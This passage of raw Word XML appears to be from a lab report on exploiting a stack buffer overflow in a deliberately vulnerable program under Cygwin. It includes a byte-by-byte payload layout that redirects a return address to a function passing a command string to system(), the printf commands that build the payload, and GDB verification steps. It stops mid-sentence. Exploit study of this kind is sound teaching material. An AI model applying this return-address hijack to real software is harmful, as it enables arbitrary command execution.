          <w:p w14:paraId="6E7985C0" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="470D15FA" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Value written</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="5C110224" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="3DAF2D6F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00260F84" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0 - 71</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F2DE882" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>72 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F3DADDA" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Filler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C435843" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0x41 x72 ("A")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E9DFAE6" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Pads </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>BufOve[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>14] up to the saved EBP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="13712475" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="046EDA1D" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>72 - 75</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BB23565" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EB739A2" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Saved EBP overwrite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="062AE2CF" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0x42424242 ("B")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="364BC27E" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Overwrites VulnerableLocalData's saved frame pointer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="6A71F134" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76905752" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>76 - 79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A72D52F" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4269313C" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Saved return address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5892975F" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0x004013A3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AC609C8" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Address of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ArcInjection(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>) - hijacks control flow on RET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="7E9DF4B8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="303F56E5" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>80 - 83</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08F56477" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="491BD177" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>"Phantom" return slot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B3FB0D3" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0x42424242 ("B")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="656F6C63" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Absorbs the return address ArcInjection's own prologue expects, since it was entered via RET, not CALL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="4022991D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CC2201F" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>84 - 87</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E5700AF" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AC1EEA0" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Argument pointer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CEC3AAE" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0x0022CCA8 (little-endian: A8 CC 22 00)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D93F4C9" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Value ArcInjection reads at [ebp+8] as its char *R argument</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="52E59202" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A58BC10" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>88 - 187</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09337314" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>100 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15D281C3" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Landing-zone cushion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47C8D1DB" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0x20 x100 (space characters)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E27AB5A" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Tolerance zone so small stack-address drift still lands inside whitespace, which the shell ignores</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="6B1B5039" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C1F295F" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>188 - 225</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="628308C3" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>38 B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57F40637" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Command string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="479F62F7" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/cygdrive/c/WINDOWS/system32/calc.exe\0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48A488A7" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">POSIX-style path (Cygwin's </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>system(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>) invokes /bin/sh, not cmd.exe) with null terminator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11E18795" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="002A57EE">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141B0FC3" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Three implementation details were important to making the final payload reliable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D385AE4" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Little endian encoding: x86 stores multibyte values with the least significant byte first. Therefore, address 0x0022CCA8 is written to the payload as A8 CC 22 00 rather than 00 22 CC A8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2603DFBB" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Landing zone cushion: stack addresses observed under GDB can differ slightly from addresses observed during a standalone run because the debugger changes the process environment. To reduce sensitivity to small address shifts, the payload includes 100 space characters before the command string. If the argument pointer lands within that region, the shell ignores the leading whitespace and continues to the command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAAC8FE" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">POSIX style path: Cygwin's </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) invokes /bin/sh -c rather than the native Windows command interpreter. A Windows path such as C:\WINDOWS\system32\calc.exe is therefore parsed incorrectly because the shell treats backslashes as escape characters and does not interpret the drive letter in the Windows form. Using /cygdrive/c/WINDOWS/system32/calc.exe gives the shell a path it can resolve correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDC418" w14:textId="395841EA" w:rsidR="002A57EE" w:rsidRPr="00F339BF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F339BF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>6. Building the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B887E1A" w14:textId="46349A85" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Because Python and Perl were unavailable in the VM, the payload was assembled directly from shell utilities. A </w:t>
      </w:r>
      <w:r w:rsidR="00A166FF">
        <w:t>well-known</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prefix was copied with head -c, exact byte values were appended with printf and hexadecimal escapes, and each stage was checked with ls -la </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>for file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> size and od -A x -t x1z for the resulting byte sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A5376" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:spacing w:before="80" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>head -c 80 payload_arc.bin &gt; payload.bin        # proven filler+EBP+retaddr (offsets 0-79)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>printf '\x42\x42\x42\x42' &gt;&gt; payload.bin           # phantom return-address slot (80-83)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>printf '\xa8\xcc\x22\x00' &gt;&gt; payload.bin           # argument pointer, little-endian (84-87)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>for i in $(seq 1 100); do printf ' ' &gt;&gt; payload.bin; done   # 100-byte cushion (88-187)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>printf '/cygdrive/c/WINDOWS/system32/calc.exe\x00' &gt;&gt; payload.bin   # command + NUL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A408932" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRPr="00F339BF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F339BF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>7. Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DC06E6" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verification focused on the three properties required for the exploit to be considered successful: control flow reached </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">), the function received the intended argument, and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) executed the supplied command. GDB breakpoints and memory inspection were used to verify each stage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C018731" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">break ArcInjection; run 2 payload.bin confirmed that execution reached </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ArcInjection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) and that R resolved to the landing zone followed by the intended command path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC09EA" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After stepping across the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) call, print $eax returned 0, indicating that the shell command completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300528CE" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A companion payload that invoked touch provided </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>an external</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
